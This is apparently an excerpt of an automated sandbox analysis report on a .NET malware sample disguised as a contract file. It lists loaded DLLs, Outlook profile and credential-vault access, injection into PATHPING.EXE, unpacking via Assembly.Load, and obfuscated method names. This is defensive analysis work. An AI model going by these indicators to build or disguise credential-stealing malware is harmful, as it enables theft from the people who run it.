                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: draft contract for order #782334.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: draft contract for order #782334.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: draft contract for order #782334.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: pathping.pdb source: draft contract for order #782334.exe, 00000002.00000002.2090355948.0000000001418000.00000004.00000020.00020000.00000000.sdmp, RprkEKYwQARXc.exe, 00000006.00000002.4135009104.0000000001278000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: RprkEKYwQARXc.exe, 00000006.00000000.2004979682.00000000009DE000.00000002.00000001.01000000.0000000C.sdmp, RprkEKYwQARXc.exe, 00000008.00000002.4134690606.00000000009DE000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: pathping.pdbGCTL source: draft contract for order #782334.exe, 00000002.00000002.2090355948.0000000001418000.00000004.00000020.00020000.00000000.sdmp, RprkEKYwQARXc.exe, 00000006.00000002.4135009104.0000000001278000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: draft contract for order #782334.exe, 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000003.2091729333.000000000345D000.00000004.00000020.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000003.2090106360.00000000032A7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: hmRI.pdbSHA256 source: draft contract for order #782334.exe
                Source: Binary string: wntdll.pdb source: draft contract for order #782334.exe, draft contract for order #782334.exe, 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, PATHPING.EXE, 00000007.00000003.2091729333.000000000345D000.00000004.00000020.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000003.2090106360.00000000032A7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: hmRI.pdb source: draft contract for order #782334.exe

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: draft contract for order #782334.exe, Form1.cs.Net Code: InitializeComponent
                Source: 0.2.draft contract for order #782334.exe.bba0000.4.raw.unpack, BT1SvfX5pm6WfGSXgh.cs.Net Code: viO27037Nv System.Reflection.Assembly.Load(byte[])
                Source: 0.2.draft contract for order #782334.exe.4b90a68.2.raw.unpack, BT1SvfX5pm6WfGSXgh.cs.Net Code: viO27037Nv System.Reflection.Assembly.Load(byte[])
                Source: 0.2.draft contract for order #782334.exe.4060b90.1.raw.unpack, Uo.cs.Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.draft contract for order #782334.exe.5bb0000.3.raw.unpack, Uo.cs.Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.draft contract for order #782334.exe.4b09448.0.raw.unpack, BT1SvfX5pm6WfGSXgh.cs.Net Code: viO27037Nv System.Reflection.Assembly.Load(byte[])
                Source: 7.2.PATHPING.EXE.3c3cd14.2.raw.unpack, Form1.cs.Net Code: InitializeComponent
                Source: 8.2.RprkEKYwQARXc.exe.2e3cd14.1.raw.unpack, Form1.cs.Net Code: InitializeComponent
                Source: 8.0.RprkEKYwQARXc.exe.2e3cd14.1.raw.unpack, Form1.cs.Net Code: InitializeComponent
                Source: 9.2.firefox.exe.2f3cd14.0.raw.unpack, Form1.cs.Net Code: InitializeComponent
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0041187B push edx; iretd 2_2_00411881
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_00405808 push 147E0EDDh; iretd 2_2_0040580F
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_004051E4 push esi; ret 2_2_004051E5
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_004153EB push ebx; iretd 2_2_0041540B
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_00415B81 push ebp; ret 2_2_00415BE6
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0040B40A pushad ; retf 2_2_0040B40B
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_00403420 push eax; ret 2_2_00403422
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_004175E8 push ds; iretd 2_2_004175F1
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_00413E64 push ds; retf 2_2_00413E6E
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_00415FC0 pushfd ; retf 2_2_00415FC6
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_00417FFB push cs; retf 2_2_0041801A
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016D225F pushad ; ret 2_2_016D27F9
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016D27FA pushad ; ret 2_2_016D27F9
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017009AD push ecx; mov dword ptr [esp], ecx2_2_017009B6
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016D283D push eax; iretd 2_2_016D2858
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeCode function: 6_2_0325A373 pushad ; retf 6_2_0325A374
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeCode function: 6_2_03264354 push ebx; iretd 6_2_03264374
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeCode function: 6_2_03256384 push ds; retf 6_2_0325638C
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeCode function: 6_2_03264AEA push ebp; ret 6_2_03264B4F
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeCode function: 6_2_0325414D push esi; ret 6_2_0325414E
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeCode function: 6_2_03264F29 pushfd ; retf 6_2_03264F2F
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeCode function: 6_2_03266F64 push cs; retf 6_2_03266F83
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeCode function: 6_2_03254771 push 147E0EDDh; iretd 6_2_03254778
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeCode function: 6_2_032607E4 push edx; iretd 6_2_032607EA
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeCode function: 6_2_03266549 push ds; iretd 6_2_0326655A
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0361225F pushad ; ret 7_2_036127F9
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_036127FA pushad ; ret 7_2_036127F9
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_036409AD push ecx; mov dword ptr [esp], ecx7_2_036409B6
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0361283D push eax; iretd 7_2_03612858
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BA23E5 push 147E0EDDh; iretd 7_2_02BA23EC
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BB41C5 push ds; iretd 7_2_02BB41CE
                Source: draft contract for order #782334.exeStatic PE information: section name: .text entropy: 7.963186264062305
                Source: 0.2.draft contract for order #782334.exe.bba0000.4.raw.unpack, T7SAIy8s3QaMaAKAVV.csHigh entropy of concatenated method names: 'Dispose', 'xrK3NTocNi', 'XrcJiX0fmj', 'e73EEtaplt', 'c7O34NX9o5', 'rfn3zm4MaZ', 'ProcessDialogKey', 'nO4JYsp4Xk', 'kLrJ3PUMIh', 'iDGJJMWQ4l'
                Source: 0.2.draft contract for order #782334.exe.bba0000.4.raw.unpack, EpFthq6SeOWTPmwK5vV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LGw0AEJKHY', 'eT506nHtio', 'uXc0LV9VnG', 'yWK0wQ6Qfn', 'jrN0MHefGe', 'wDy0C7iPae', 'GUW0FYy7Xv'
                Source: 0.2.draft contract for order #782334.exe.bba0000.4.raw.unpack, t7aWY2JfX08qdMC8yT.csHigh entropy of concatenated method names: 'KEVmXYgii3', 'I21mQWx2r9', 'ocUmAxgLuA', 'JWmm6AC5B6', 'q9Ymip5W4C', 'pyXmoDMfqt', 'BFfmrP4CJd', 'O4Im9HWq2Z', 'VLWmZVquWW', 'XItmjgeTeC'
                Source: 0.2.draft contract for order #782334.exe.bba0000.4.raw.unpack, K8N0rdryY0VjexmvBh.csHigh entropy of concatenated method names: 'eKfSxjxkSH', 't6hSVOvIOu', 'OxtSWuntQm', 'nimSvDcwmn', 'kjdStTVmKh', 'kb3Sa3bYDA', 'jvMSf5Vu4B', 'tu7ScQ340s', 'WlaSBEer90', 'roQSUG5HTQ'
                Source: 0.2.draft contract for order #782334.exe.bba0000.4.raw.unpack, eegnrfovenGAtahD1x.csHigh entropy of concatenated method names: 'OFk5O0MGcq', 'vad540k7yl', 'vDVSY9s7HF', 'cf7S3ISJsc', 'RiN5DKlZsV', 'kPm5Qhojpy', 'wEi5hhRfej', 'MYF5AcAXfZ', 'sug56eAqkD', 'LKX5LKiaIj'
                Source: 0.2.draft contract for order #782334.exe.bba0000.4.raw.unpack, SbxMawGDFc1cYCqZlF.csHigh entropy of concatenated method names: 'EhZSguUsIH', 'W0lSiq0PRV', 'EqWSoiAdk9', 'q0jSritQXs', 'v6mSAI495y', 'EvoS9eJAxj', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.draft contract for order #782334.exe.bba0000.4.raw.unpack, BT1SvfX5pm6WfGSXgh.csHigh entropy of concatenated method names: 'sgGdl8O9kU', 'CJ2dxQYpBY', 'Hl3dVKuj3r', 'pQKdWZbhoh', 'u9edvAvg3M', 'VFydtH1E8V', 'usXda77ayE', 'dxldfd2LVV', 'anOdcYxYKP', 'r1SdBaYGh8'
                Source: 0.2.draft contract for order #782334.exe.bba0000.4.raw.unpack, dOnqtYxW6fCr5C4gUB.csHigh entropy of concatenated method names: 'U3TKkLgrVW', 'BTDKR5h1A2', 'cXDKgJjygf', 'cIhKiu7V1a', 'XODKr4fcMQ', 'kXjK9YPXk1', 'e4ZKjLIhiT', 'WVGKuk3Fws', 'cZWKXf3bsd', 'nuLKDpcSyD'
                Source: 0.2.draft contract for order #782334.exe.bba0000.4.raw.unpack, uAPtON66OIsqQN9BPw5.csHigh entropy of concatenated method names: 'ToString', 'c440d1xdYX', 'jhF02twn86', 'WGm0lu3HH7', 'TLP0x91Dmp', 'YxE0V16CPS', 'UcI0W3FHSy', 'Mos0vV5hEB', 'jSIMnXGFLqOKjlHV8mW', 'igfZERGcFUbi4KBNHYj'
                Source: 0.2.draft contract for order #782334.exe.bba0000.4.raw.unpack, eku3ZZQJyWRgCApSxB.csHigh entropy of concatenated method names: 'J063am5ZX0', 'ewl3fS2Aj4', 'spr3B1MQmN', 'W673UlPoBB', 'xVo3mHA3Ww', 'rFE3sxJGQQ', 'W1IXvRljgfOqo2K3yp', 'jtGJ6swDYso4GQCoiv', 'YOr33jTc9v', 'aoe3dMkkab'
                Source: 0.2.draft contract for order #782334.exe.bba0000.4.raw.unpack, lGFC0HIiY7o3iUEU6U.csHigh entropy of concatenated method names: 'ToString', 'YsQsDvWdtH', 'rROsiQtjkv', 'cvPsouMdga', 'iR4srtbQU2', 'Q61s98Tpbf', 'MnZsZQL8Bp', 'H6OsjJSIf3', 'mqMsungxwt', 'KjLsGeUCnX'
                Source: 0.2.draft contract for order #782334.exe.bba0000.4.raw.unpack, t2pR6skCicQqKjshfc.csHigh entropy of concatenated method names: 'KMkvPmFXiH', 'vmlvnWWnDf', 'tj5WoNDxd7', 'wPcWre7LPh', 'GM3W93EvIL', 'sZ9WZL1s1X', 'odaWjhOFt8', 'dV4WuGFbl3', 'lvmWGTD3Nd', 'cYkWXRY8eQ'
                Source: 0.2.draft contract for order #782334.exe.bba0000.4.raw.unpack, brGu3hc2hcqi3Ph5uR.csHigh entropy of concatenated method names: 'xja4Oxn2tDAi3TwbaLw', 'Uu1MTHnm9ZyBt0xqqr8', 'TlitSIp6MV', 'aYttp67fce', 'obBt0P8gW0', 'df7IN2nK7F08Xx4yl5T', 'YNYQdLnfEyrSw1fZvfw'
                Source: 0.2.draft contract for order #782334.exe.bba0000.4.raw.unpack, Daa9x6p8K4JlMbJdQy.csHigh entropy of concatenated method names: 'zMK7NNJhG', 'FaKIdXcVr', 'ONf1af93v', 'Rcjn9y8i0', 'LfVRtj2h7', 'uuyTtqkoV', 'yMOmhj9V3RvkrIEZFh', 'bkH9SFUGO8Av7xIcZI', 'GsFSCKwrC', 'v5l0Q37ub'
                Source: 0.2.draft contract for order #782334.exe.bba0000.4.raw.unpack, BZkO9lBsWxu4CvMeio.csHigh entropy of concatenated method names: 'txgtlqkyOs', 'CKjtVfV1ti', 'jBYtv2tTxc', 'FvFtaQnOYT', 'xLatfUOS4Z', 'EO3vM4Q77U', 'UCwvCtGd0C', 'u9mvFBRUjX', 'lUovOEpSpO', 'MP4vNiGG2R'
                Source: 0.2.draft contract for order #782334.exe.bba0000.4.raw.unpack, FClwO49SKVoyopkRBu.csHigh entropy of concatenated method names: 'CQ4ayPNaAd', 'mK4abtA49k', 'l7Ra7Pa1QB', 'jMGaIg5brW', 'NmwaPZKhUR', 'jKea1oSRAN', 'TadanqYJuV', 'jnVakPYLID', 'IgGaRMStto', 'WkiaTrC91L'
                Source: 0.2.draft contract for order #782334.exe.bba0000.4.raw.unpack, Xr6bVuWI8Xsm8tjknr.csHigh entropy of concatenated method names: 'TsFp3rI3Jx', 'fGfpdSwFud', 'pwPp2WnuTa', 'TOepxpetsm', 'MoypVpMRm6', 'tfPpvuhvOn', 'gyAptaphPb', 'gptSFnUXEI', 'r46SOlH4lV', 'ANQSN8xgQk'
                Source: 0.2.draft contract for order #782334.exe.bba0000.4.raw.unpack, HVj9taPB6orrMyXKMK.csHigh entropy of concatenated method names: 'R00VAUXSTa', 'DGgV608fWW', 'fkPVLZnEtS', 'luDVwX72Ph', 'um6VMKMB2S', 'O9gVC4yrtv', 'UWGVFeIUib', 'WDPVOXSMp0', 'QXSVNyccTq', 'j0IV4fqEr9'
                Source: 0.2.draft contract for order #782334.exe.bba0000.4.raw.unpack, aRsIYS6aC76so6fOE9u.csHigh entropy of concatenated method names: 'UutpynFH5f', 'VrKpbtmqpF', 'VEXp7Bq6Ub', 'fvqpIskQxb', 'iZLpPuP29S', 'vL0p1mGbuC', 'n0GpnHtcQr', 'iuepkLr4uN', 'QR9pRagyRJ', 'eDppTMhHgy'
                Source: 0.2.draft contract for order #782334.exe.4b90a68.2.raw.unpack, T7SAIy8s3QaMaAKAVV.csHigh entropy of concatenated method names: 'Dispose', 'xrK3NTocNi', 'XrcJiX0fmj', 'e73EEtaplt', 'c7O34NX9o5', 'rfn3zm4MaZ', 'ProcessDialogKey', 'nO4JYsp4Xk', 'kLrJ3PUMIh', 'iDGJJMWQ4l'
                Source: 0.2.draft contract for order #782334.exe.4b90a68.2.raw.unpack, EpFthq6SeOWTPmwK5vV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LGw0AEJKHY', 'eT506nHtio', 'uXc0LV9VnG', 'yWK0wQ6Qfn', 'jrN0MHefGe', 'wDy0C7iPae', 'GUW0FYy7Xv'
                Source: 0.2.draft contract for order #782334.exe.4b90a68.2.raw.unpack, t7aWY2JfX08qdMC8yT.csHigh entropy of concatenated method names: 'KEVmXYgii3', 'I21mQWx2r9', 'ocUmAxgLuA', 'JWmm6AC5B6', 'q9Ymip5W4C', 'pyXmoDMfqt', 'BFfmrP4CJd', 'O4Im9HWq2Z', 'VLWmZVquWW', 'XItmjgeTeC'
                Source: 0.2.draft contract for order #782334.exe.4b90a68.2.raw.unpack, K8N0rdryY0VjexmvBh.csHigh entropy of concatenated method names: 'eKfSxjxkSH', 't6hSVOvIOu', 'OxtSWuntQm', 'nimSvDcwmn', 'kjdStTVmKh', 'kb3Sa3bYDA', 'jvMSf5Vu4B', 'tu7ScQ340s', 'WlaSBEer90', 'roQSUG5HTQ'
                Source: 0.2.draft contract for order #782334.exe.4b90a68.2.raw.unpack, eegnrfovenGAtahD1x.csHigh entropy of concatenated method names: 'OFk5O0MGcq', 'vad540k7yl', 'vDVSY9s7HF', 'cf7S3ISJsc', 'RiN5DKlZsV', 'kPm5Qhojpy', 'wEi5hhRfej', 'MYF5AcAXfZ', 'sug56eAqkD', 'LKX5LKiaIj'
                Source: 0.2.draft contract for order #782334.exe.4b90a68.2.raw.unpack, SbxMawGDFc1cYCqZlF.csHigh entropy of concatenated method names: 'EhZSguUsIH', 'W0lSiq0PRV', 'EqWSoiAdk9', 'q0jSritQXs', 'v6mSAI495y', 'EvoS9eJAxj', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.draft contract for order #782334.exe.4b90a68.2.raw.unpack, BT1SvfX5pm6WfGSXgh.csHigh entropy of concatenated method names: 'sgGdl8O9kU', 'CJ2dxQYpBY', 'Hl3dVKuj3r', 'pQKdWZbhoh', 'u9edvAvg3M', 'VFydtH1E8V', 'usXda77ayE', 'dxldfd2LVV', 'anOdcYxYKP', 'r1SdBaYGh8'
                Source: 0.2.draft contract for order #782334.exe.4b90a68.2.raw.unpack, dOnqtYxW6fCr5C4gUB.csHigh entropy of concatenated method names: 'U3TKkLgrVW', 'BTDKR5h1A2', 'cXDKgJjygf', 'cIhKiu7V1a', 'XODKr4fcMQ', 'kXjK9YPXk1', 'e4ZKjLIhiT', 'WVGKuk3Fws', 'cZWKXf3bsd', 'nuLKDpcSyD'
                Source: 0.2.draft contract for order #782334.exe.4b90a68.2.raw.unpack, uAPtON66OIsqQN9BPw5.csHigh entropy of concatenated method names: 'ToString', 'c440d1xdYX', 'jhF02twn86', 'WGm0lu3HH7', 'TLP0x91Dmp', 'YxE0V16CPS', 'UcI0W3FHSy', 'Mos0vV5hEB', 'jSIMnXGFLqOKjlHV8mW', 'igfZERGcFUbi4KBNHYj'
                Source: 0.2.draft contract for order #782334.exe.4b90a68.2.raw.unpack, eku3ZZQJyWRgCApSxB.csHigh entropy of concatenated method names: 'J063am5ZX0', 'ewl3fS2Aj4', 'spr3B1MQmN', 'W673UlPoBB', 'xVo3mHA3Ww', 'rFE3sxJGQQ', 'W1IXvRljgfOqo2K3yp', 'jtGJ6swDYso4GQCoiv', 'YOr33jTc9v', 'aoe3dMkkab'
                Source: 0.2.draft contract for order #782334.exe.4b90a68.2.raw.unpack, lGFC0HIiY7o3iUEU6U.csHigh entropy of concatenated method names: 'ToString', 'YsQsDvWdtH', 'rROsiQtjkv', 'cvPsouMdga', 'iR4srtbQU2', 'Q61s98Tpbf', 'MnZsZQL8Bp', 'H6OsjJSIf3', 'mqMsungxwt', 'KjLsGeUCnX'
                Source: 0.2.draft contract for order #782334.exe.4b90a68.2.raw.unpack, t2pR6skCicQqKjshfc.csHigh entropy of concatenated method names: 'KMkvPmFXiH', 'vmlvnWWnDf', 'tj5WoNDxd7', 'wPcWre7LPh', 'GM3W93EvIL', 'sZ9WZL1s1X', 'odaWjhOFt8', 'dV4WuGFbl3', 'lvmWGTD3Nd', 'cYkWXRY8eQ'
                Source: 0.2.draft contract for order #782334.exe.4b90a68.2.raw.unpack, brGu3hc2hcqi3Ph5uR.csHigh entropy of concatenated method names: 'xja4Oxn2tDAi3TwbaLw', 'Uu1MTHnm9ZyBt0xqqr8', 'TlitSIp6MV', 'aYttp67fce', 'obBt0P8gW0', 'df7IN2nK7F08Xx4yl5T', 'YNYQdLnfEyrSw1fZvfw'
                Source: 0.2.draft contract for order #782334.exe.4b90a68.2.raw.unpack, Daa9x6p8K4JlMbJdQy.csHigh entropy of concatenated method names: 'zMK7NNJhG', 'FaKIdXcVr', 'ONf1af93v', 'Rcjn9y8i0', 'LfVRtj2h7', 'uuyTtqkoV', 'yMOmhj9V3RvkrIEZFh', 'bkH9SFUGO8Av7xIcZI', 'GsFSCKwrC', 'v5l0Q37ub'
                Source: 0.2.draft contract for order #782334.exe.4b90a68.2.raw.unpack, BZkO9lBsWxu4CvMeio.csHigh entropy of concatenated method names: 'txgtlqkyOs', 'CKjtVfV1ti', 'jBYtv2tTxc', 'FvFtaQnOYT', 'xLatfUOS4Z', 'EO3vM4Q77U', 'UCwvCtGd0C', 'u9mvFBRUjX', 'lUovOEpSpO', 'MP4vNiGG2R'
                Source: 0.2.draft contract for order #782334.exe.4b90a68.2.raw.unpack, FClwO49SKVoyopkRBu.csHigh entropy of concatenated method names: 'CQ4ayPNaAd', 'mK4abtA49k', 'l7Ra7Pa1QB', 'jMGaIg5brW', 'NmwaPZKhUR', 'jKea1oSRAN', 'TadanqYJuV', 'jnVakPYLID', 'IgGaRMStto', 'WkiaTrC91L'
                Source: 0.2.draft contract for order #782334.exe.4b90a68.2.raw.unpack, Xr6bVuWI8Xsm8tjknr.csHigh entropy of concatenated method names: 'TsFp3rI3Jx', 'fGfpdSwFud', 'pwPp2WnuTa', 'TOepxpetsm', 'MoypVpMRm6', 'tfPpvuhvOn', 'gyAptaphPb', 'gptSFnUXEI', 'r46SOlH4lV', 'ANQSN8xgQk'
                Source: 0.2.draft contract for order #782334.exe.4b90a68.2.raw.unpack, HVj9taPB6orrMyXKMK.csHigh entropy of concatenated method names: 'R00VAUXSTa', 'DGgV608fWW', 'fkPVLZnEtS', 'luDVwX72Ph', 'um6VMKMB2S', 'O9gVC4yrtv', 'UWGVFeIUib', 'WDPVOXSMp0', 'QXSVNyccTq', 'j0IV4fqEr9'
                Source: 0.2.draft contract for order #782334.exe.4b90a68.2.raw.unpack, aRsIYS6aC76so6fOE9u.csHigh entropy of concatenated method names: 'UutpynFH5f', 'VrKpbtmqpF', 'VEXp7Bq6Ub', 'fvqpIskQxb', 'iZLpPuP29S', 'vL0p1mGbuC', 'n0GpnHtcQr', 'iuepkLr4uN', 'QR9pRagyRJ', 'eDppTMhHgy'
                Source: 0.2.draft contract for order #782334.exe.4b09448.0.raw.unpack, T7SAIy8s3QaMaAKAVV.csHigh entropy of concatenated method names: 'Dispose', 'xrK3NTocNi', 'XrcJiX0fmj', 'e73EEtaplt', 'c7O34NX9o5', 'rfn3zm4MaZ', 'ProcessDialogKey', 'nO4JYsp4Xk', 'kLrJ3PUMIh', 'iDGJJMWQ4l'
                Source: 0.2.draft contract for order #782334.exe.4b09448.0.raw.unpack, EpFthq6SeOWTPmwK5vV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LGw0AEJKHY', 'eT506nHtio', 'uXc0LV9VnG', 'yWK0wQ6Qfn', 'jrN0MHefGe', 'wDy0C7iPae', 'GUW0FYy7Xv'
                Source: 0.2.draft contract for order #782334.exe.4b09448.0.raw.unpack, t7aWY2JfX08qdMC8yT.csHigh entropy of concatenated method names: 'KEVmXYgii3', 'I21mQWx2r9', 'ocUmAxgLuA', 'JWmm6AC5B6', 'q9Ymip5W4C', 'pyXmoDMfqt', 'BFfmrP4CJd', 'O4Im9HWq2Z', 'VLWmZVquWW', 'XItmjgeTeC'
                Source: 0.2.draft contract for order #782334.exe.4b09448.0.raw.unpack, K8N0rdryY0VjexmvBh.csHigh entropy of concatenated method names: 'eKfSxjxkSH', 't6hSVOvIOu', 'OxtSWuntQm', 'nimSvDcwmn', 'kjdStTVmKh', 'kb3Sa3bYDA', 'jvMSf5Vu4B', 'tu7ScQ340s', 'WlaSBEer90', 'roQSUG5HTQ'
                Source: 0.2.draft contract for order #782334.exe.4b09448.0.raw.unpack, eegnrfovenGAtahD1x.csHigh entropy of concatenated method names: 'OFk5O0MGcq', 'vad540k7yl', 'vDVSY9s7HF', 'cf7S3ISJsc', 'RiN5DKlZsV', 'kPm5Qhojpy', 'wEi5hhRfej', 'MYF5AcAXfZ', 'sug56eAqkD', 'LKX5LKiaIj'
                Source: 0.2.draft contract for order #782334.exe.4b09448.0.raw.unpack, SbxMawGDFc1cYCqZlF.csHigh entropy of concatenated method names: 'EhZSguUsIH', 'W0lSiq0PRV', 'EqWSoiAdk9', 'q0jSritQXs', 'v6mSAI495y', 'EvoS9eJAxj', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.draft contract for order #782334.exe.4b09448.0.raw.unpack, BT1SvfX5pm6WfGSXgh.csHigh entropy of concatenated method names: 'sgGdl8O9kU', 'CJ2dxQYpBY', 'Hl3dVKuj3r', 'pQKdWZbhoh', 'u9edvAvg3M', 'VFydtH1E8V', 'usXda77ayE', 'dxldfd2LVV', 'anOdcYxYKP', 'r1SdBaYGh8'
